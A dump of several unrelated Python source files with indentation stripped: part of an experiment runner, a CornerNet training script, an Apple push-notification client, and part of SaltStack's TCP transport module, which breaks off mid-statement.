f"{env}->{zone}: deleted successfully: {self.parent.remote_path(env, zone)!s}"
)
else:
self.parent.logger.debug(
f"{env}->{zone}: failed to delete: {self.parent.remote_path(env, zone)!s}"
)
with Timeout(60, throwing=False) as timeout:
_ = driver.send(
path_from=self.path,
path_to=Path.joinpath(
self.parent.remote_path(env, zone),
self.path.relative_to(self.parent.path),
),
)
if not _.ok:
_msg = f"{env}->{zone}: failed to send: {_.stderr}"
self.parent.logger.critical(_msg)
raise ExperimentRuntimeError(_msg)
else:
self.parent.logger.info(f"{env}->{zone}: experiment sent!")
if timeout.timed_out:
driver.disconnect()
raise ExperimentRuntimeError(
f"{env}->{zone}: Timed out after 30s during experiment sending"
)
previous_id = cp.copy(current_id)
previous_wd = cp.copy(current_wd)
def fetch_and_cleanup(self, env):
previous_id = None
previous_wd = None
for zone, driver in self.parent.drivers[env].items():
current_id = driver.connection_id
current_wd = driver.working_directory
if current_id == previous_id and current_wd == previous_wd:
self.parent.logger.debug(
f"{env}->{zone}: skipping fetching due to same id and working directory "
f"in the previous driver ({previous_id}->{previous_wd})"
)
else:
fetch_result = driver.fetch(
path_from=Path.joinpath(
self.parent.remote_path(env, zone),
self.path.relative_to(self.parent.path),
),
path_to=self.path,
)
if not fetch_result.ok:
_msg = f"{env}->{zone}: failed to fetch logs: {fetch_result.stderr}"
self.parent.logger.critical(_msg)
else:
self.parent.logger.info(f"{env}->{zone}: experiment logs fetched!")
driver.delete(
path=str(
Path.joinpath(
self.parent.remote_path(env, zone),
self.path.relative_to(self.parent.path),
)
),
recursive=True,
)
previous_id = cp.copy(current_id)
previous_wd = cp.copy(current_wd)
def estimated_duration(self, env=None) -> t.Optional[float]:
"""Get the estimated duration of this Run's execution
Args:
env (optional): An environment name, if the estimate is environment-specific
Returns:
t.Optional[float]: the duration in seconds, or None if not digested
"""
raise NotImplementedError
|
train_chart.py
|
#!/usr/bin/env python
import os
import json
import torch
import numpy as np
import queue
import pprint
import random
import argparse
import importlib
import threading
import traceback
from socket import error as SocketError
import errno
import re
from tqdm import tqdm
from utils import stdout_to_tqdm
from config import system_configs
from nnet.py_factory import NetworkFactory
from azureml.core.run import Run
from torch.multiprocessing import Process, Queue, Pool
from db.datasets import datasets
import time
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def parse_args():
parser = argparse.ArgumentParser(description="Train CornerNet")
parser.add_argument("--cfg_file", dest="cfg_file", help="config file", default="CornerNetLineClsReal", type=str)
# parser.add_argument("--cfg_file", dest="cfg_file", help="config file", default="CornerNetPureBar", type=str)
parser.add_argument("--iter", dest="start_iter", help="train at iteration i", default=0, type=int)
parser.add_argument("--threads", dest="threads", default=1, type=int)
parser.add_argument('--cache_path', dest="cache_path",default="./data/cache/", type=str)
parser.add_argument("--data_dir", dest="data_dir", default="./data/linedata(1028)", type=str)
args = parser.parse_args()
return args
def prefetch_data(db, queue, sample_data, data_aug):
ind = 0
print("start prefetching data...")
np.random.seed(os.getpid())
while True:
try:
data, ind = sample_data(db, ind, data_aug=data_aug)
queue.put(data)
except Exception as e:
print('Encountered an error while prefetching data!')
traceback.print_exc()
def pin_memory(data_queue, pinned_data_queue, sema):
while True:
try:
data = data_queue.get()
data["xs"] = [x.pin_memory() for x in data["xs"]]
data["ys"] = [y.pin_memory() for y in data["ys"]]
pinned_data_queue.put(data)
if sema.acquire(blocking=False):
return
except SocketError as e:
if e.errno != errno.ECONNRESET:
raise
pass
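# pin_memory() runs in a daemon thread: it moves CPU tensors from the multiprocessing queue into
# page-locked (pinned) memory so later host-to-GPU copies can be faster/asynchronous, and it exits
# once train() releases training_pin_semaphore (the non-blocking acquire only succeeds after that release).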
def init_parallel_jobs(dbs, queue, fn, data_aug):
tasks = [Process(target=prefetch_data, args=(db, queue, fn, data_aug)) for db in dbs]
for task in tasks:
task.daemon = True
task.start()
return tasks
def train(training_dbs, validation_db, start_iter=0):
learning_rate = system_configs.learning_rate
max_iteration = system_configs.max_iter
pretrained_model = system_configs.pretrain
snapshot = system_configs.snapshot
val_iter = system_configs.val_iter
display = system_configs.display
decay_rate = system_configs.decay_rate
stepsize = system_configs.stepsize
val_ind = 0
print("building model...")
nnet = NetworkFactory(training_dbs[0])
# getting the size of each database
training_size = len(training_dbs[0].db_inds)
validation_size = len(validation_db.db_inds)
# queues storing data for training
training_queue = Queue(32)
# queues storing pinned data for training
pinned_training_queue = queue.Queue(32)
# load data sampling function
data_file = "sample.{}".format(training_dbs[0].data)
sample_data = importlib.import_module(data_file).sample_data
# allocating resources for parallel reading
training_tasks = init_parallel_jobs(training_dbs, training_queue, sample_data, True)
training_pin_semaphore = threading.Semaphore()
training_pin_semaphore.acquire()
training_pin_args = (training_queue, pinned_training_queue, training_pin_semaphore)
training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
training_pin_thread.daemon = True
training_pin_thread.start()
run = Run.get_context()
if pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise ValueError("pretrained model does not exist")
print("loading from pretrained model")
nnet.load_pretrained_params(pretrained_model)
if start_iter:
if start_iter == -1:
print("training starts from the latest iteration")
save_list = os.listdir(system_configs.snapshot_dir)
save_list.sort(reverse=True)
if len(save_list) > 0:
target_save = save_list[0]
start_iter = int(re.findall(r'\d+', target_save)[0])
learning_rate /= (decay_rate ** (start_iter // stepsize))
nnet.load_params(start_iter)
else:
start_iter = 0
nnet.set_lr(learning_rate)
print("training starts from iteration {} with learning_rate {}".format(start_iter + 1, learning_rate))
else:
nnet.set_lr(learning_rate)
print("training start...")
nnet.cuda()
nnet.train_mode()
if not os.path.exists('./outputs'):
os.makedirs('./outputs')
print('outputs file created')
else:
print(os.listdir('./outputs'))
error_count = 0
for iteration in tqdm(range(start_iter + 1, max_iteration + 1)):
try:
training = pinned_training_queue.get(block=True)
except Exception:
print('Error when extracting data')
error_count += 1
if error_count > 10:
print('failed')
time.sleep(1)
break
continue
training_loss = nnet.train(**training)
if display and iteration % display == 0:
print("training loss at iteration {}: {}".format(iteration, training_loss.item()))
run.log('train_loss', training_loss.item())
val_iter = 5  # NOTE: hard-coded here, overriding the configured system_configs.val_iter
if val_iter and validation_db.db_inds.size and iteration % val_iter == 0:
nnet.eval_mode()
validation, val_ind = sample_data(validation_db, val_ind, data_aug=False)
validation_loss = nnet.validate(**validation)
print("validation loss at iteration {}: {}".format(iteration, validation_loss.item()))
run.log('val_loss', validation_loss.item())
nnet.train_mode()
if iteration % snapshot == 0:
nnet.save_params(iteration)
if iteration % stepsize == 0:
learning_rate /= decay_rate
nnet.set_lr(learning_rate)
# sending signal to kill the thread
training_pin_semaphore.release()
# terminating data fetching processes
for training_task in training_tasks:
training_task.terminate()
if __name__ == "__main__":
args = parse_args()
cfg_file = os.path.join(system_configs.config_dir, args.cfg_file + ".json")
with open(cfg_file, "r") as f:
configs = json.load(f)
configs["system"]["data_dir"] = args.data_dir
configs["system"]["cache_dir"] = args.cache_path
file_list_data = os.listdir(args.data_dir)
print(file_list_data)
configs["system"]["snapshot_name"] = args.cfg_file
system_configs.update_config(configs["system"])
train_split = system_configs.train_split
val_split = system_configs.val_split
print("loading all datasets...")
dataset = system_configs.dataset
# threads = max(torch.cuda.device_count() * 2, 4)
threads = args.threads
print("using {} threads".format(threads))
training_dbs = [datasets[dataset](configs["db"], train_split) for _ in range(threads)]
validation_db = datasets[dataset](configs["db"], val_split)
print("system config...")
pprint.pprint(system_configs.full)
print("db config...")
pprint.pprint(training_dbs[0].configs)
print("len of db: {}".format(len(training_dbs[0].db_inds)))
train(training_dbs, validation_db, args.start_iter)
|
client.py
|
import collections
import json
import logging
import time
import weakref
from enum import Enum
from json import JSONEncoder
from threading import Thread
from typing import Deque, Dict, Iterable, Optional, Tuple, Type, Union
from .credentials import CertificateCredentials, Credentials
from .errors import ConnectionFailed, exception_class_for_reason
# We don't generally need to know about the Credentials subclasses except to
# keep the old API, where APNsClient took a cert_file
from .payload import Payload
class NotificationPriority(Enum):
Immediate = '10'
Delayed = '5'
RequestStream = collections.namedtuple('RequestStream', ['stream_id', 'token'])
Notification = collections.namedtuple('Notification', ['token', 'payload'])
DEFAULT_APNS_PRIORITY = NotificationPriority.Immediate
CONCURRENT_STREAMS_SAFETY_MAXIMUM = 1000
MAX_CONNECTION_RETRIES = 3
logger = logging.getLogger(__name__)
class APNsClient(object):
SANDBOX_SERVER = 'api.sandbox.push.apple.com'
LIVE_SERVER = 'api.push.apple.com'
DEFAULT_PORT = 443
ALTERNATIVE_PORT = 2197
def __init__(self,
credentials: Union[Credentials, str],
use_sandbox: bool = False, use_alternative_port: bool = False, proto: Optional[str] = None,
json_encoder: Optional[Type[JSONEncoder]] = None, password: Optional[str] = None,
proxy_host: Optional[str] = None, proxy_port: Optional[int] = None,
heartbeat_period: Optional[float] = None) -> None:
if isinstance(credentials, str):
self.__credentials = CertificateCredentials(credentials, password) # type: Credentials
else:
self.__credentials = credentials
self._init_connection(use_sandbox, use_alternative_port, proto, proxy_host, proxy_port)
if heartbeat_period:
self._start_heartbeat(heartbeat_period)
self.__json_encoder = json_encoder
self.__max_concurrent_streams = 0
self.__previous_server_max_concurrent_streams = None
def _init_connection(self, use_sandbox: bool, use_alternative_port: bool, proto: Optional[str],
proxy_host: Optional[str], proxy_port: Optional[int]) -> None:
server = self.SANDBOX_SERVER if use_sandbox else self.LIVE_SERVER
port = self.ALTERNATIVE_PORT if use_alternative_port else self.DEFAULT_PORT
self._connection = self.__credentials.create_connection(server, port, proto, proxy_host, proxy_port)
def _start_heartbeat(self, heartbeat_period: float) -> None:
conn_ref = weakref.ref(self._connection)
def watchdog() -> None:
while True:
conn = conn_ref()
if conn is None:
break
conn.ping('-' * 8)
time.sleep(heartbeat_period)
thread = Thread(target=watchdog)
thread.daemon = True
thread.start()
def send(self, token_hex: str, notification: Payload, topic: Optional[str] = None,
priority: NotificationPriority = NotificationPriority.Immediate,
expiration: Optional[int] = None, collapse_id: Optional[str] = None) -> int:
stream_id = self.send_notification_async(token_hex, notification, topic, priority, expiration, collapse_id)
return stream_id
def send_notification(self, token_hex: str, notification: Payload, topic: Optional[str] = None,
priority: NotificationPriority = NotificationPriority.Immediate,
expiration: Optional[int] = None, collapse_id: Optional[str] = None) -> None:
stream_id = self.send_notification_async(token_hex, notification, topic, priority, expiration, collapse_id)
result = self.get_notification_result(stream_id)
if result != 'Success':
if isinstance(result, tuple):
reason, info = result
raise exception_class_for_reason(reason)(info)
else:
raise exception_class_for_reason(result)
def send_notification_async(self, token_hex: str, notification: Payload, topic: Optional[str] = None,
priority: NotificationPriority = NotificationPriority.Immediate,
expiration: Optional[int] = None, collapse_id: Optional[str] = None) -> int:
json_str = json.dumps(notification, cls=self.__json_encoder, ensure_ascii=False, separators=(',', ':'))
json_payload = json_str.encode('utf-8')
headers = {
'apns-push-type': 'alert'
}
if topic is not None:
headers['apns-topic'] = topic
if priority != DEFAULT_APNS_PRIORITY:
headers['apns-priority'] = priority.value
if expiration is not None:
headers['apns-expiration'] = '%d' % expiration
auth_header = self.__credentials.get_authorization_header(topic)
if auth_header is not None:
headers['authorization'] = auth_header
if collapse_id is not None:
headers['apns-collapse-id'] = collapse_id
url = '/3/device/{}'.format(token_hex)
stream_id = self._connection.request('POST', url, json_payload, headers) # type: int
return stream_id
def get_connection(self):
return self._connection
def get_notification_result(self, stream_id: int) -> Union[str, Tuple[str, str]]:
"""
Get result for specified stream
The function returns: 'Success' or 'failure reason' or ('Unregistered', timestamp)
"""
with self._connection.get_response(stream_id) as response:
if response.status == 200:
return 'Success'
else:
raw_data = response.read().decode('utf-8')
data = json.loads(raw_data) # type: Dict[str, str]
if response.status == 410:
return data['reason'], data['timestamp']
else:
return data['reason']
def send_notification_batch(self, notifications: Iterable[Notification], topic: Optional[str] = None,
priority: NotificationPriority = NotificationPriority.Immediate,
expiration: Optional[int] = None, collapse_id: Optional[str] = None
) -> Dict[str, Union[str, Tuple[str, str]]]:
"""
Send a notification to a list of tokens in batch. Instead of sending a synchronous request
for each token, send multiple requests concurrently. This is done on the same connection,
using HTTP/2 streams (one request per stream).
APNs allows many streams simultaneously, but the number of streams can vary depending on
server load. This method reads the SETTINGS frame sent by the server to figure out the
maximum number of concurrent streams. Typically, APNs reports a maximum of 500.
The function returns a dictionary mapping each token to its result. The result is "Success"
if the token was sent successfully, or the string returned by APNs in the 'reason' field of
the response, if the token generated an error.
"""
notification_iterator = iter(notifications)
next_notification = next(notification_iterator, None)
# Make sure we're connected to APNs, so that we receive and process the server's SETTINGS
# frame before starting to send notifications.
self.connect()
results = {}
open_streams = collections.deque() # type: Deque[RequestStream]
# Loop on the tokens, sending as many requests as possible concurrently to APNs.
# When reaching the maximum concurrent streams limit, wait for a response before sending
# another request.
while len(open_streams) > 0 or next_notification is not None:
# Update the max_concurrent_streams on every iteration since a SETTINGS frame can be
# sent by the server at any time.
self.update_max_concurrent_streams()
if next_notification is not None and len(open_streams) < self.__max_concurrent_streams:
logger.info('Sending to token %s', next_notification.token)
stream_id = self.send_notification_async(next_notification.token, next_notification.payload, topic,
priority, expiration, collapse_id)
open_streams.append(RequestStream(stream_id, next_notification.token))
next_notification = next(notification_iterator, None)
if next_notification is None:
# No tokens remaining. Proceed to get results for pending requests.
logger.info('Finished sending all tokens, waiting for pending requests.')
else:
# We have at least one request waiting for response (otherwise we would have either
# sent new requests or exited the while loop.) Wait for the first outstanding stream
# to return a response.
pending_stream = open_streams.popleft()
result = self.get_notification_result(pending_stream.stream_id)
logger.info('Got response for %s: %s', pending_stream.token, result)
results[pending_stream.token] = result
return results
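# Example batch usage (illustrative only; tokens, topic and the Payload arguments are placeholders):
# notifications = [Notification(token=t, payload=Payload(alert="hello")) for t in device_tokens]
# results = client.send_notification_batch(notifications, topic="com.example.app")
# failed = {token: reason for token, reason in results.items() if reason != "Success"}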
def update_max_concurrent_streams(self) -> None:
# Get the max_concurrent_streams setting returned by the server.
# The max_concurrent_streams value is saved in the H2Connection instance that must be
# accessed using a with statement in order to acquire a lock.
# pylint: disable=protected-access
with self._connection._conn as connection:
max_concurrent_streams = connection.remote_settings.max_concurrent_streams
if max_concurrent_streams == self.__previous_server_max_concurrent_streams:
# The server hasn't issued an updated SETTINGS frame.
return
self.__previous_server_max_concurrent_streams = max_concurrent_streams
# Handle and log unexpected values sent by APNs, just in case.
if max_concurrent_streams > CONCURRENT_STREAMS_SAFETY_MAXIMUM:
logger.warning('APNs max_concurrent_streams too high (%s), resorting to default maximum (%s)',
max_concurrent_streams, CONCURRENT_STREAMS_SAFETY_MAXIMUM)
self.__max_concurrent_streams = CONCURRENT_STREAMS_SAFETY_MAXIMUM
elif max_concurrent_streams < 1:
logger.warning('APNs reported max_concurrent_streams less than 1 (%s), using value of 1',
max_concurrent_streams)
self.__max_concurrent_streams = 1
else:
logger.info('APNs set max_concurrent_streams to %s', max_concurrent_streams)
self.__max_concurrent_streams = max_concurrent_streams
def connect(self) -> None:
"""
Establish a connection to APNs. If already connected, the function does nothing. If the
connection fails, the function retries up to MAX_CONNECTION_RETRIES times.
"""
retries = 0
while retries < MAX_CONNECTION_RETRIES:
# noinspection PyBroadException
try:
self._connection.connect()
logger.info('Connected to APNs')
return
except Exception: # pylint: disable=broad-except
# close the connection, otherwise the next connect() call would do nothing
self._connection.close()
retries += 1
logger.exception('Failed connecting to APNs (attempt %s of %s)', retries, MAX_CONNECTION_RETRIES)
raise ConnectionFailed()
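# Minimal end-to-end sketch, assuming this module is importable alongside its sibling payload module
# (the cert path, device token, topic and Payload(alert=...) arguments below are placeholders/assumptions):
# client = APNsClient("path/to/cert.pem", use_sandbox=True)
# client.send_notification("<64-hex-device-token>", Payload(alert="hi"), topic="com.example.app")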
|
tcp.py
|
"""
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
"""
import errno
import logging
import os
import queue
import socket
import threading
import time
import traceback
import urllib.parse as urlparse
import weakref
import salt.crypt
import salt.exceptions
import salt.ext.tornado
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.iostream
import salt.ext.tornado.netutil
import salt.ext.tornado.tcpclient
import salt.ext.tornado.tcpserver
import salt.payload
import salt.transport.client
import salt.transport.frame
import salt.transport.ipc
import salt.transport.mixins.auth
import salt.transport.server
import salt.utils.asynchronous
import salt.utils.event
import salt.utils.files
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.utils.versions
from salt.exceptions import SaltClientError, SaltReqTimeoutError
from salt.transport import iter_transport_opts
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
if salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import salt.ext.tornado.util
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
"""
Ensure that TCP keepalives are set for the socket.
"""
if hasattr(socket, "SO_KEEPALIVE"):
if opts.get("tcp_keepalive", False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, "SOL_TCP"):
if hasattr(socket, "TCP_KEEPIDLE"):
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE, int(tcp_keepalive_idle)
)
if hasattr(socket, "TCP_KEEPCNT"):
tcp_keepalive_cnt = opts.get("tcp_keepalive_cnt", -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT, int(tcp_keepalive_cnt)
)
if hasattr(socket, "TCP_KEEPINTVL"):
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP,
socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl),
)
if hasattr(socket, "SIO_KEEPALIVE_VALS"):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(
socket.SIO_KEEPALIVE_VALS,
(
1,
int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000),
),
)
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
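# Example opts consumed above (keys exactly as read by this helper; the values are illustrative):
# {"tcp_keepalive": True, "tcp_keepalive_idle": 300, "tcp_keepalive_cnt": 3, "tcp_keepalive_intvl": 60}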
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingProcess):
"""
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
handle a given connection.
"""
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, **kwargs):
super().__init__(**kwargs)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on
# Windows.
def __setstate__(self, state):
self.__init__(
state["opts"],
state["socket_queue"],
log_queue=state["log_queue"],
log_queue_level=state["log_queue_level"],
)
def __getstate__(self):
return {
"opts": self.opts,
"socket_queue": self.socket_queue,
"log_queue": self.log_queue,
"log_queue_level": self.log_queue_level,
}
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def run(self):
"""
Start the load balancer
"""
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except OSError as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if (
salt.ext.tornado.util.errno_from_exception(e)
== errno.ECONNABORTED
):
continue
raise
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
"""
Encapsulate sending routines to tcp.
Note: this class returns a singleton
"""
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
async_methods = [
"crypted_transfer_decode_dictentry",
"_crypted_transfer",
"_uncrypted_transfer",
"send",
]
close_methods = [
"close",
]
def __new__(cls, opts, **kwargs):
"""
Only create one instance of channel per __key()
"""
# do we have any mapping for this io_loop
io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug("Initializing new AsyncTCPReqChannel for %s", key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug("Re-using AsyncTCPReqChannel for %s", key)
return obj
@classmethod
def __key(cls, opts, **kwargs):
if "master_uri" in kwargs:
opts["master_uri"] = kwargs["master_uri"]
return (
opts["pki_dir"], # where the keys are stored
opts["id"], # minion ID
opts["master_uri"],
kwargs.get("crypt", "aes"), # TODO: use the same channel for crypt
)
@classmethod
def force_close_all_instances(cls):
"""
Will force close all instances
:return: None
"""
for weak_dict in list(cls.instance_map.values()):
for instance in list(weak_dict.values()):
instance.close()
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.serial = salt.payload.Serial(self.opts)
# crypt defaults to 'aes'
self.crypt = kwargs.get("crypt", "aes")
self.io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
if self.crypt != "clear":
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
resolver = kwargs.get("resolver")
parse = urlparse.urlparse(self.opts["master_uri"])
master_host, master_port = parse.netloc.rsplit(":", 1)
self.master_addr = (master_host, int(master_port))
self._closing = False
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, master_host, int(master_port),),
kwargs={
"io_loop": self.io_loop,
"resolver": resolver,
"source_ip": self.opts.get("source_ip"),
"source_port": self.opts.get("source_ret_port"),
},
)
def close(self):
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
"This is not the last %s instance. Not closing yet.",
self.__class__.__name__,
)
return
log.debug("Closing %s instance", self.__class__.__name__)
self._closing = True
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self.io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self.io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self.io_loop]
# pylint: disable=W1701
def __del__(self):
with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except OSError as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
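# e.g. _package_load({"cmd": "_minion_event"}) -> {"enc": "aes", "load": {"cmd": "_minion_event"}}
# (with the default crypt; when constructed with crypt="clear" the "enc" field is "clear" instead)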
@salt.ext.tornado.gen.coroutine
def crypted_transfer_decode_dictentry(
self, load, dictkey=None, tries=3, timeout=60
):
if not self.auth.authenticated:
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout
)
key = self.auth.get_keys()
if HAS_M2:
aes = key.private_decrypt(ret["key"], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret["key"])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
@salt.ext.tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
"""
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
"""
@salt.ext.tornado.gen.coroutine
def _do_transfer():
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
if not self.auth.authenticated:
yield self.auth.authenticate()
try:
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
"""
Send a request, return a future which will complete when we send the message
"""
try:
if self.crypt == "clear":
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
except salt.ext.tornado.iostream.StreamClosedError:
# Convert to 'SaltClientError' so that clients can handle this
# exception more appropriately.
raise SaltClientError("Connection to master lost")
raise salt.ext.tornado.gen.Return(ret)
class AsyncTCPPubChannel(
salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel
):
async_methods = [
"send_id",
"connect_callback",
"connect",
]
close_methods = [
"close",
]
def __init__(self, opts, **kwargs):
self.opts = opts
self.serial = salt.payload.Serial(self.opts)
self.crypt = kwargs.get("crypt", "aes")
self.io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
self.connected = False
self._closing = False
self._reconnected = False
self.message_client = None
self.event = salt.utils.event.get_event("minion", opts=self.opts, listen=False)
def close(self):
if self._closing:
return
self._closing = True
if self.message_client is not None:
self.message_client.close()
self.message_client = None
if self.event is not None:
self.event.destroy()
self.event = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def send_id(self, tok, force_auth):
"""
Send the minion id to the master so that the master may better
track the connection state of the minion.
In case of authentication errors, try to renegotiate authentication
and retry the method.
"""
load = {"id": self.opts["id"], "tok": tok}
@salt.ext.tornado.gen.coroutine
def _do_transfer():
msg = self._package_load(self.auth.crypticle.dumps(load))
package = salt.transport.frame.frame_msg(msg, header=None)
yield self.message_client.write_to_stream(package)
raise salt.ext.tornado.gen.Return(True)
if force_auth or not self.auth.authenticated:
count = 0
while (
count <= self.opts["tcp_authentication_retries"]
or self.opts["tcp_authentication_retries"] < 0
):
try:
yield self.auth.authenticate()
break
except SaltClientError as exc:
log.debug(exc)
count += 1
try:
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def connect_callback(self, result):
if self._closing:
return
# Force re-auth on reconnect since the master
# may have been restarted
yield self.send_id(self.tok, self._reconnected)
self.connected = True
self.event.fire_event({"master": self.opts["master"]}, "__master_connected")
if self._reconnected:
# On reconnects, fire a master event to notify that the minion is
# available.
if self.opts.get("__role") == "syndic":
data = "Syndic {} started at {}".format(self.opts["id"], time.asctime())
tag = salt.utils.event.tagify([self.opts["id"], "start"], "syndic")
else:
data = "Minion {} started at {}".format(self.opts["id"], time.asctime())
tag = salt.utils.event.tagify([self.opts["id"], "start"], "minion")
load = {
"id": self.opts["id"],
"cmd": "_minion_event",
"pretag": None,
"tok": self.tok,
"data": data,
"tag": tag,
}
req_channel = salt.utils.asynchronous.SyncWrapper(
